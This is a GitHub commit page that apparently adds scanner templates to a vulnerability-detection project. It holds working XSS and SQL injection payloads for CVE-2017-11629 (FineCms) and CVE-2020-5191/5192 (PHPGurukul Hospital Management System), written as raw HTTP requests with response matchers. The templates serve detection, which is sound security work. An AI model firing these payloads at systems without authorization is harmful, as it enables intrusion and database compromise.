-
Notifications
You must be signed in to change notification settings - Fork 670
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
145 changed files
with
3,777 additions
and
2,029 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Large diffs are not rendered by default.
Oops, something went wrong.
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,12 +1,12 @@ | ||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | ||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| | ||
| cve | 1363 | daffainfo | 629 | cves | 1336 | info | 1433 | http | 3740 | | ||
| panel | 627 | dhiyaneshdk | 551 | exposed-panels | 635 | high | 971 | file | 76 | | ||
| lfi | 497 | pikpikcu | 325 | vulnerabilities | 524 | medium | 804 | network | 51 | | ||
| xss | 467 | pdteam | 269 | technologies | 276 | critical | 462 | dns | 17 | | ||
| wordpress | 417 | geeknik | 187 | exposures | 272 | low | 220 | | | | ||
| exposure | 389 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | | | ||
| cve2021 | 340 | 0x_akoko | 158 | misconfiguration | 215 | | | | | | ||
| rce | 333 | princechaddha | 150 | workflows | 187 | | | | | | ||
| wp-plugin | 312 | pussycat0x | 133 | default-logins | 102 | | | | | | ||
| tech | 288 | gy741 | 126 | file | 76 | | | | | | ||
| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 | | ||
| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 | | ||
| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 | | ||
| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 | | ||
| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | | | ||
| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | | | ||
| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | | | ||
| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | | | ||
| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | | | ||
| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
id: CVE-2017-11629 | ||
|
||
info: | ||
name: FineCms 5.0.10 - Cross Site Scripting | ||
author: ritikchaddha | ||
severity: medium | ||
description: | | ||
dayrui FineCms through 5.0.10 has Cross Site Scripting (XSS) in controllers/api.php via the function parameter in a c=api&m=data2 request. | ||
reference: | ||
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse | ||
- https://nvd.nist.gov/vuln/detail/CVE-2017-11629/ | ||
classification: | ||
cve-id: CVE-2017-11629 | ||
metadata: | ||
verified: true | ||
tags: cve,cve2017,xss,finecms | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- '<script>alert(document.domain)</script>p不存在' | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,55 @@ | ||
id: CVE-2020-5191 | ||
|
||
info: | ||
name: Hospital Management System 4.0 - Cross-Site Scripting | ||
author: TenBird | ||
severity: medium | ||
description: | | ||
PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities. | ||
reference: | ||
- https://www.exploit-db.com/exploits/47841 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2020-5191 | ||
- https://phpgurukul.com/hospital-management-system-in-php/ | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2020-5191 | ||
cwe-id: CWE-79 | ||
metadata: | ||
verified: "true" | ||
tags: cve2020,hms,cms,xss,authenticated,edb,cve | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /hospital/hms/admin/index.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
username={{username}}&password={{password}}&submit=&submit= | ||
- | | ||
POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit= | ||
redirects: true | ||
max-redirects: 2 | ||
cookie-reuse: true | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- '<td class="hidden-xs"></td><script>alert(document.domain);</script><td>' | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,53 @@ | ||
id: CVE-2020-5192 | ||
|
||
info: | ||
name: Hospital Management System 4.0 - SQL Injection | ||
author: TenBird | ||
severity: high | ||
description: | | ||
PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple SQL injection vulnerabilities: multiple pages and parameters are not validating user input, and allow for the application's database and information to be fully compromised. | ||
reference: | ||
- https://www.exploit-db.com/exploits/47840 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2020-5192 | ||
- https://phpgurukul.com/hospital-management-system-in-php/ | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 8.8 | ||
cve-id: CVE-2020-5192 | ||
cwe-id: CWE-89 | ||
metadata: | ||
verified: "true" | ||
tags: cve2020,hms,cms,sqli,authenticated,edb,cve | ||
|
||
variables: | ||
num: "999999999" | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /hospital/hms/doctor/index.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
username={{username}}password={{password}}&submit=&submit= | ||
- | | ||
POST /hospital/hms/doctor/search.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search= | ||
redirects: true | ||
max-redirects: 2 | ||
cookie-reuse: true | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- '{{md5(num)}}' | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.